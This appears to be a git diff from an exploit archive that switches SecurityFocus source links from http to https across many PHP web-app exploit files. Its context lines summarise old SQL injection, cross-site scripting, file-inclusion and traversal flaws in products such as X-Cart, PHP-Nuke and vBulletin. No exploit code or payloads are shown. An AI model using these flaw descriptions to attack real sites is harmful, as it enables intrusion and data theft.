http://www.securityfocus.com/bid/9560/info +source: https://www.securityfocus.com/bid/9560/info X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. diff --git a/exploits/php/webapps/23637.txt b/exploits/php/webapps/23637.txt index c6387d006..7a06b166c 100644 --- a/exploits/php/webapps/23637.txt +++ b/exploits/php/webapps/23637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9560/info +source: https://www.securityfocus.com/bid/9560/info X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. diff --git a/exploits/php/webapps/23639.txt b/exploits/php/webapps/23639.txt index 864822f55..1adb8e507 100644 --- a/exploits/php/webapps/23639.txt +++ b/exploits/php/webapps/23639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9563/info +source: https://www.securityfocus.com/bid/9563/info X-Cart has been reported to be prone to an issue that may allow remote attackers to view any web server readable files on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. This issue has been reported to affect the 'auth.php' script. diff --git a/exploits/php/webapps/23640.txt b/exploits/php/webapps/23640.txt index 097942815..9e681b89c 100644 --- a/exploits/php/webapps/23640.txt +++ b/exploits/php/webapps/23640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9564/info +source: https://www.securityfocus.com/bid/9564/info phpMyAdmin is prone to a vulnerability that may permit remote attackers to gain access to files that are readable by the hosting web server. The issue is reported to exist in the 'export.php' script and may be exploited by providing directory traversal sequences as an argument for a specific URI parameter. diff --git a/exploits/php/webapps/23644.php b/exploits/php/webapps/23644.php index 5b3d2fc31..996048cde 100644 --- a/exploits/php/webapps/23644.php +++ b/exploits/php/webapps/23644.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9569/info +source: https://www.securityfocus.com/bid/9569/info Multiple vulnerabilities were reported in PHPX. The specific issues include cross-site scripting, HTML injection and account hijacking via specially crafted cookies. diff --git a/exploits/php/webapps/23645.txt b/exploits/php/webapps/23645.txt index 9fe3b1987..cd72646f0 100644 --- a/exploits/php/webapps/23645.txt +++ b/exploits/php/webapps/23645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9574/info +source: https://www.securityfocus.com/bid/9574/info It has been reported that ReviewPost PHP Pro may be prone to multiple SQL injection vulnerabilities that may allow an attacker to influence SQL query logic. This issue could be exploited to disclose sensitive information that may be used to gain unauthorized access. An attacker may pass malicious data via the 'product' parameter of 'showproduct.php' script and the 'cat' parameter of 'showcat.php' script. diff --git a/exploits/php/webapps/23646.txt b/exploits/php/webapps/23646.txt index 23d0b01d1..a8d3e9a8a 100644 --- a/exploits/php/webapps/23646.txt +++ b/exploits/php/webapps/23646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9574/info +source: https://www.securityfocus.com/bid/9574/info It has been reported that ReviewPost PHP Pro may be prone to multiple SQL injection vulnerabilities that may allow an attacker to influence SQL query logic. This issue could be exploited to disclose sensitive information that may be used to gain unauthorized access. An attacker may pass malicious data via the 'product' parameter of 'showproduct.php' script and the 'cat' parameter of 'showcat.php' script. diff --git a/exploits/php/webapps/23653.txt b/exploits/php/webapps/23653.txt index 4b0ee81df..e2e3cb891 100644 --- a/exploits/php/webapps/23653.txt +++ b/exploits/php/webapps/23653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9584/info +source: https://www.securityfocus.com/bid/9584/info It has been reported that Discuz! is prone to an Cross Site Scripting vulnerability. This issue is caused by the application failing to properly sanitize links embedded within user messages. Upon successful exploitation of this issue, a malicious user could steal cookie based authentication credentials or other information within the context of the affected web page. diff --git a/exploits/php/webapps/23657.txt b/exploits/php/webapps/23657.txt index 3ee42cf15..9b4ece8e6 100644 --- a/exploits/php/webapps/23657.txt +++ b/exploits/php/webapps/23657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9588/info +source: https://www.securityfocus.com/bid/9588/info It has been reported that Mambo Open Source may be prone to a cross-site scripting vulnerability that may allow a remote attacker to execute arbitrary HTML or script code in a user's browser. The issue exists in the 'Itemid' parameter of 'index.php' script. diff --git a/exploits/php/webapps/23663.txt b/exploits/php/webapps/23663.txt index f77de0eec..d3c7518dc 100644 --- a/exploits/php/webapps/23663.txt +++ b/exploits/php/webapps/23663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9605/info +source: https://www.securityfocus.com/bid/9605/info It has been reported that the PHP-Nuke module 'News' is prone to a cross-site scripting vulnerability. The issue arises due to the module failing to properly sanitize user-supplied information. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code. This would occur in the security context of the site hosting the software. diff --git a/exploits/php/webapps/23669.txt b/exploits/php/webapps/23669.txt index b293e263c..e2666859b 100644 --- a/exploits/php/webapps/23669.txt +++ b/exploits/php/webapps/23669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9613/info +source: https://www.securityfocus.com/bid/9613/info It has been reported that the PHP-Nuke module 'Reviews' is prone to a cross-site scripting vulnerability. The issue arises due to the module failing to properly sanitize user-supplied information. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code. This would occur in the security context of the site hosting the software. diff --git a/exploits/php/webapps/23670.pl b/exploits/php/webapps/23670.pl index 93d5e5632..ea194d5fd 100755 --- a/exploits/php/webapps/23670.pl +++ b/exploits/php/webapps/23670.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9615/info +source: https://www.securityfocus.com/bid/9615/info It has been reported that the 'public message' feature of PHP-Nuke is vulnerable to an SQL injection vulnerability. The issue is due to improper sanitization of user-defined parameters supplied to the module. As a result, an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information. diff --git a/exploits/php/webapps/23680.php b/exploits/php/webapps/23680.php index 3fd0bcbd9..2061e8e85 100644 --- a/exploits/php/webapps/23680.php +++ b/exploits/php/webapps/23680.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9630/info +source: https://www.securityfocus.com/bid/9630/info It has been reported that PHPNuke may prone to a SQL injection vulnerability, due to insufficient sanitization user-supplied input. The problem is reported to exist in the $category variable contained within the 'index.php' page. diff --git a/exploits/php/webapps/23683.txt b/exploits/php/webapps/23683.txt index e63c2ce63..b09da239f 100644 --- a/exploits/php/webapps/23683.txt +++ b/exploits/php/webapps/23683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9638/info +source: https://www.securityfocus.com/bid/9638/info It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules. diff --git a/exploits/php/webapps/23684.txt b/exploits/php/webapps/23684.txt index f8a00dcde..8a68c0d50 100644 --- a/exploits/php/webapps/23684.txt +++ b/exploits/php/webapps/23684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9638/info +source: https://www.securityfocus.com/bid/9638/info It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules. diff --git a/exploits/php/webapps/23685.txt b/exploits/php/webapps/23685.txt index 5a732b3bb..fbfd5df93 100644 --- a/exploits/php/webapps/23685.txt +++ b/exploits/php/webapps/23685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9639/info +source: https://www.securityfocus.com/bid/9639/info An SQL injection vulnerability has been reported to affect BosDates calendar system. The issue arises due to insufficient sanitization of user supplied data. As a result of this issue an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information. diff --git a/exploits/php/webapps/23687.txt b/exploits/php/webapps/23687.txt index bea098b64..5a8d07448 100644 --- a/exploits/php/webapps/23687.txt +++ b/exploits/php/webapps/23687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9646/info +source: https://www.securityfocus.com/bid/9646/info A vulnerability has been reported in Macallan Mail Solution that may permit remote attackers to bypass authentication for the web interface. This may be exploited by submitting a specially crafted HTTP GET request for the administration page of the web interface. diff --git a/exploits/php/webapps/23688.txt b/exploits/php/webapps/23688.txt index 3b5f9ec0d..c69106c02 100644 --- a/exploits/php/webapps/23688.txt +++ b/exploits/php/webapps/23688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9649/info +source: https://www.securityfocus.com/bid/9649/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Upon successful exploitation, this issue may allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/php/webapps/23691.txt b/exploits/php/webapps/23691.txt index 350cd1607..89441ce0b 100644 --- a/exploits/php/webapps/23691.txt +++ b/exploits/php/webapps/23691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9656/info +source: https://www.securityfocus.com/bid/9656/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'search.php' script. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Successful exploitation of this issue may allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/php/webapps/23697.txt b/exploits/php/webapps/23697.txt index c76a8766b..9e22fb9b7 100644 --- a/exploits/php/webapps/23697.txt +++ b/exploits/php/webapps/23697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9664/info +source: https://www.securityfocus.com/bid/9664/info Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. diff --git a/exploits/php/webapps/23698.txt b/exploits/php/webapps/23698.txt index 471b7177f..58c7c6266 100644 --- a/exploits/php/webapps/23698.txt +++ b/exploits/php/webapps/23698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9664/info +source: https://www.securityfocus.com/bid/9664/info Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. diff --git a/exploits/php/webapps/23699.txt b/exploits/php/webapps/23699.txt index 62ee17daa..306c6ba26 100644 --- a/exploits/php/webapps/23699.txt +++ b/exploits/php/webapps/23699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9664/info +source: https://www.securityfocus.com/bid/9664/info Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. diff --git a/exploits/php/webapps/23710.txt b/exploits/php/webapps/23710.txt index 641ffca1c..8d8c4b2e4 100644 --- a/exploits/php/webapps/23710.txt +++ b/exploits/php/webapps/23710.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9674/info +source: https://www.securityfocus.com/bid/9674/info It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software. diff --git a/exploits/php/webapps/23711.txt b/exploits/php/webapps/23711.txt index 6334c5586..5eedc28a4 100644 --- a/exploits/php/webapps/23711.txt +++ b/exploits/php/webapps/23711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9676/info +source: https://www.securityfocus.com/bid/9676/info Multiple vulnerabilities have been identified in the software due to improper sanitization of user-supplied input. Successful exploitation of these issues could allow an attacker to carry out cross-site scripting and SQL injection attacks via the 'id' parameter of 'more.php' script. diff --git a/exploits/php/webapps/23712.txt b/exploits/php/webapps/23712.txt index 3fca65084..1929f3ea5 100644 --- a/exploits/php/webapps/23712.txt +++ b/exploits/php/webapps/23712.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9676/info +source: https://www.securityfocus.com/bid/9676/info Multiple vulnerabilities have been identified in the software due to improper sanitization of user-supplied input. Successful exploitation of these issues could allow an attacker to carry out cross-site scripting and SQL injection attacks via the 'id' parameter of 'more.php' script. diff --git a/exploits/php/webapps/23718.txt b/exploits/php/webapps/23718.txt index ef449be3e..4a61093e9 100644 --- a/exploits/php/webapps/23718.txt +++ b/exploits/php/webapps/23718.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9687/info +source: https://www.securityfocus.com/bid/9687/info It has been reported that Online Store Kit is prone to multiple SQL injection vulnerabilities. These issues arise due to insufficient sanitation of user-supplied input via the URI. diff --git a/exploits/php/webapps/23719.txt b/exploits/php/webapps/23719.txt index 5ee33094e..81bdea81e 100644 --- a/exploits/php/webapps/23719.txt +++ b/exploits/php/webapps/23719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9687/info +source: https://www.securityfocus.com/bid/9687/info It has been reported that Online Store Kit is prone to multiple SQL injection vulnerabilities. These issues arise due to insufficient sanitation of user-supplied input via the URI. diff --git a/exploits/php/webapps/23720.txt b/exploits/php/webapps/23720.txt index 96ff20d33..547e35b48 100644 --- a/exploits/php/webapps/23720.txt +++ b/exploits/php/webapps/23720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9687/info +source: https://www.securityfocus.com/bid/9687/info It has been reported that Online Store Kit is prone to multiple SQL injection vulnerabilities. These issues arise due to insufficient sanitation of user-supplied input via the URI. diff --git a/exploits/php/webapps/23722.txt b/exploits/php/webapps/23722.txt index fd734aa0e..c3c4fb1d0 100644 --- a/exploits/php/webapps/23722.txt +++ b/exploits/php/webapps/23722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23723.txt b/exploits/php/webapps/23723.txt index 2147ecfc6..11a814d4a 100644 --- a/exploits/php/webapps/23723.txt +++ b/exploits/php/webapps/23723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23724.txt b/exploits/php/webapps/23724.txt index 3d5e7db73..dad0f5015 100644 --- a/exploits/php/webapps/23724.txt +++ b/exploits/php/webapps/23724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23725.txt b/exploits/php/webapps/23725.txt index d045caf03..c366ab6b8 100644 --- a/exploits/php/webapps/23725.txt +++ b/exploits/php/webapps/23725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23726.txt b/exploits/php/webapps/23726.txt index 2a8df68e1..6e244676f 100644 --- a/exploits/php/webapps/23726.txt +++ b/exploits/php/webapps/23726.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23727.txt b/exploits/php/webapps/23727.txt index 76302b8d9..57e2508ae 100644 --- a/exploits/php/webapps/23727.txt +++ b/exploits/php/webapps/23727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23742.txt b/exploits/php/webapps/23742.txt index 4a4082d88..d0e314fc4 100644 --- a/exploits/php/webapps/23742.txt +++ b/exploits/php/webapps/23742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9720/info +source: https://www.securityfocus.com/bid/9720/info phpNewsManager is prone to a file disclosure vulnerability. Remote attackers may submit malicious requests to the software that contain directory traversal sequences, potentially exposing sensitive resources outside of the hosting web server root. diff --git a/exploits/php/webapps/23744.txt b/exploits/php/webapps/23744.txt index 6cf99cc0a..8256e69de 100644 --- a/exploits/php/webapps/23744.txt +++ b/exploits/php/webapps/23744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9725/info +source: https://www.securityfocus.com/bid/9725/info ezboard is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code encapsulated in [font] tags of posts to the bulletin board. This code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting ezboard. diff --git a/exploits/php/webapps/23745.txt b/exploits/php/webapps/23745.txt index bfbbd8f93..e061344e9 100644 --- a/exploits/php/webapps/23745.txt +++ b/exploits/php/webapps/23745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9726/info +source: https://www.securityfocus.com/bid/9726/info XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database. diff --git a/exploits/php/webapps/23746.txt b/exploits/php/webapps/23746.txt index 591b1961b..d57d909ff 100644 --- a/exploits/php/webapps/23746.txt +++ b/exploits/php/webapps/23746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9726/info +source: https://www.securityfocus.com/bid/9726/info XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database. diff --git a/exploits/php/webapps/23747.txt b/exploits/php/webapps/23747.txt index 7a6785d73..7a95773bd 100644 --- a/exploits/php/webapps/23747.txt +++ b/exploits/php/webapps/23747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9726/info +source: https://www.securityfocus.com/bid/9726/info XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database. diff --git a/exploits/php/webapps/23748.txt b/exploits/php/webapps/23748.txt index 66bdd4cc5..580d6121c 100644 --- a/exploits/php/webapps/23748.txt +++ b/exploits/php/webapps/23748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9726/info +source: https://www.securityfocus.com/bid/9726/info XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database. diff --git a/exploits/php/webapps/23749.txt b/exploits/php/webapps/23749.txt index 623b2d12f..1cd361602 100644 --- a/exploits/php/webapps/23749.txt +++ b/exploits/php/webapps/23749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9727/info +source: https://www.securityfocus.com/bid/9727/info LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet (CSS) tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability. diff --git a/exploits/php/webapps/23753.txt b/exploits/php/webapps/23753.txt index 5cfb0f79a..5bad7a19b 100644 --- a/exploits/php/webapps/23753.txt +++ b/exploits/php/webapps/23753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9737/info +source: https://www.securityfocus.com/bid/9737/info It has been reported that BadBlue Server may be prone to a remote path disclosure vulnerability that may allow an attacker to disclose the installation path by issuing a request for 'phptest.php' script. diff --git a/exploits/php/webapps/23767.txt b/exploits/php/webapps/23767.txt index c4add0d76..886acdcc7 100644 --- a/exploits/php/webapps/23767.txt +++ b/exploits/php/webapps/23767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9768/info +source: https://www.securityfocus.com/bid/9768/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/23770.txt b/exploits/php/webapps/23770.txt index 793b0e686..0a6500d9e 100644 --- a/exploits/php/webapps/23770.txt +++ b/exploits/php/webapps/23770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9771/info +source: https://www.securityfocus.com/bid/9771/info It has been reported that iGeneric Free Shopping Cart is prone to an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI parameters diff --git a/exploits/php/webapps/23773.txt b/exploits/php/webapps/23773.txt index ada25f479..2dcc1a117 100644 --- a/exploits/php/webapps/23773.txt +++ b/exploits/php/webapps/23773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9773/info +source: https://www.securityfocus.com/bid/9773/info It has been reported that iGeneric Free Shopping Cart is prone to a cross-site vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI parameters diff --git a/exploits/php/webapps/23774.txt b/exploits/php/webapps/23774.txt index d3abe6287..9ec0f2306 100644 --- a/exploits/php/webapps/23774.txt +++ b/exploits/php/webapps/23774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9774/info +source: https://www.securityfocus.com/bid/9774/info It has been reported that YaBB SE may be prone to multiple vulnerabilities due to improper input validation. The issues may allow an attacker to carry out SQL injection and directory traversal attacks. Successful exploitation of these issues may allow an attacker to gain access to sensitive information that may be used to mount further attacks against a vulnerable system. The SQL injection vulnerabilities can be exploited to gain access to user authentication credentials and corrupt user information in the underlying database. diff --git a/exploits/php/webapps/23775.txt b/exploits/php/webapps/23775.txt index 025ce6e8c..6ea84e122 100644 --- a/exploits/php/webapps/23775.txt +++ b/exploits/php/webapps/23775.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9774/info +source: https://www.securityfocus.com/bid/9774/info It has been reported that YaBB SE may be prone to multiple vulnerabilities due to improper input validation. The issues may allow an attacker to carry out SQL injection and directory traversal attacks. Successful exploitation of these issues may allow an attacker to gain access to sensitive information that may be used to mount further attacks against a vulnerable system. The SQL injection vulnerabilities can be exploited to gain access to user authentication credentials and corrupt user information in the underlying database. diff --git a/exploits/php/webapps/23792.txt b/exploits/php/webapps/23792.txt index 2972a468e..9759befc7 100644 --- a/exploits/php/webapps/23792.txt +++ b/exploits/php/webapps/23792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9812/info +source: https://www.securityfocus.com/bid/9812/info It has been reported that the VirtuaNews non-default modules 'Files' and 'Vulns' are prone to multiple cross-site scripting vulnerabilities. These problems surround the application's failure to properly validate user supplied URI input. When exploited an attacker can execute arbitrary script and HTML code in the context of the vulnerable application. diff --git a/exploits/php/webapps/23795.txt b/exploits/php/webapps/23795.txt index 226f72984..a418039d3 100644 --- a/exploits/php/webapps/23795.txt +++ b/exploits/php/webapps/23795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9822/info +source: https://www.securityfocus.com/bid/9822/info It has been reported that Invision Power Board may be prone to a cross-site scripting vulnerability. This may allow a remote attacker to cause hostile HTML or script code to be rendered in a user's browser via a malicious link to a vulnerable site.. The issue presents itself due to insufficient sanitization of user-supplied data via the 'pop' URI parameter, which will be included in dynamically generated web pages. diff --git a/exploits/php/webapps/23797.txt b/exploits/php/webapps/23797.txt index 165018083..fc4a0fb1a 100644 --- a/exploits/php/webapps/23797.txt +++ b/exploits/php/webapps/23797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9830/info +source: https://www.securityfocus.com/bid/9830/info It has been reported that an input validation error with the potential for use in a SQL injection attack is present in the "db_mysql_loeschen2.php" script. When a user is requesting the "db_mysql_loeschen2.php" script, one of the parameters that can be passed to the script is "db". There are no checks on the value of this variable before it is used in an SQL query string. diff --git a/exploits/php/webapps/23798.txt b/exploits/php/webapps/23798.txt index 5700b6aca..8f36b567b 100644 --- a/exploits/php/webapps/23798.txt +++ b/exploits/php/webapps/23798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9831/info +source: https://www.securityfocus.com/bid/9831/info The Confixx PERL debugging utility functionality has been reported to be prone to a remote command execution vulnerability. The issue is reported to occur when a command sequence is appended to a HTTP request for a PERL script resource, the command sequence must contain a prefixed ';' semi-colon character. When this request is processed, the command sequence will be reportedly executed with the privileges of the process that invokes the Confixx PERL debugging utility. diff --git a/exploits/php/webapps/23812.txt b/exploits/php/webapps/23812.txt index f7f5fc69b..d3a1fe3cf 100644 --- a/exploits/php/webapps/23812.txt +++ b/exploits/php/webapps/23812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9873/info +source: https://www.securityfocus.com/bid/9873/info It has been reported that YaBB and YaBB SE are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the applications to properly validate URI supplied user input. diff --git a/exploits/php/webapps/23814.txt b/exploits/php/webapps/23814.txt index fff326f95..48ed9c9ec 100644 --- a/exploits/php/webapps/23814.txt +++ b/exploits/php/webapps/23814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9879/info +source: https://www.securityfocus.com/bid/9879/info It has been reported that PHP-Nuke may be prone to multiple cross-site scripting vulnerabilities. These vulnerabilities occur due to insufficient sanitization of user-supplied data via the 'Your Name', 'nicname', 'fname', 'ratenum', and 'search' fields of 'modules.php' script. Exploitation could allow for theft of cookie-based authentication credentials. Other attacks are also possible. diff --git a/exploits/php/webapps/23815.txt b/exploits/php/webapps/23815.txt index a1598eb9c..0c933bc9b 100644 --- a/exploits/php/webapps/23815.txt +++ b/exploits/php/webapps/23815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9881/info +source: https://www.securityfocus.com/bid/9881/info It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input. diff --git a/exploits/php/webapps/23816.txt b/exploits/php/webapps/23816.txt index a8d084c10..3a3d718d4 100644 --- a/exploits/php/webapps/23816.txt +++ b/exploits/php/webapps/23816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9881/info +source: https://www.securityfocus.com/bid/9881/info It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input. diff --git a/exploits/php/webapps/23817.txt b/exploits/php/webapps/23817.txt index d74d53115..939bff551 100644 --- a/exploits/php/webapps/23817.txt +++ b/exploits/php/webapps/23817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9881/info +source: https://www.securityfocus.com/bid/9881/info It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input. diff --git a/exploits/php/webapps/23818.txt b/exploits/php/webapps/23818.txt index 53fa8831f..f7af52ec3 100644 --- a/exploits/php/webapps/23818.txt +++ b/exploits/php/webapps/23818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9882/info +source: https://www.securityfocus.com/bid/9882/info It has been reported that Phorum is prone to a cross-site scripting vulnerability across multiple modules. The issue presents itself across multiple modules including 'login.php', 'register.php', and 'profile.php'. These modules employ two hidden variables named 'f' and 'target', which are passed user-supplied input values from HTTP_REFERER without proper sanitization. diff --git a/exploits/php/webapps/23819.txt b/exploits/php/webapps/23819.txt index 714ec67cb..0720f3357 100644 --- a/exploits/php/webapps/23819.txt +++ b/exploits/php/webapps/23819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9882/info +source: https://www.securityfocus.com/bid/9882/info It has been reported that Phorum is prone to a cross-site scripting vulnerability across multiple modules. The issue presents itself across multiple modules including 'login.php', 'register.php', and 'profile.php'. These modules employ two hidden variables named 'f' and 'target', which are passed user-supplied input values from HTTP_REFERER without proper sanitization. diff --git a/exploits/php/webapps/23820.txt b/exploits/php/webapps/23820.txt index 6eb49c819..871417254 100644 --- a/exploits/php/webapps/23820.txt +++ b/exploits/php/webapps/23820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9882/info +source: https://www.securityfocus.com/bid/9882/info It has been reported that Phorum is prone to a cross-site scripting vulnerability across multiple modules. The issue presents itself across multiple modules including 'login.php', 'register.php', and 'profile.php'. These modules employ two hidden variables named 'f' and 'target', which are passed user-supplied input values from HTTP_REFERER without proper sanitization. diff --git a/exploits/php/webapps/23821.php b/exploits/php/webapps/23821.php index d2550aff8..f027c60f5 100644 --- a/exploits/php/webapps/23821.php +++ b/exploits/php/webapps/23821.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9883/info +source: https://www.securityfocus.com/bid/9883/info A vulnerability has been reported to exist in the software that may allow a remote user to inject malicious SQL syntax into database queries. The problem reportedly exists in one of the parameters of the search.php script. This issue is caused by insufficient sanitization of user-supplied data. A remote attacker may exploit this issue to influence SQL query logic to disclose sensitive information that could be used to gain unauthorized access. diff --git a/exploits/php/webapps/23822.txt b/exploits/php/webapps/23822.txt index 4dae7a13e..de3941c69 100644 --- a/exploits/php/webapps/23822.txt +++ b/exploits/php/webapps/23822.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9888/info +source: https://www.securityfocus.com/bid/9888/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'forumdisplay.php' script. This issue is reportedly due to a failure to sanitize user input and so allow for injection of 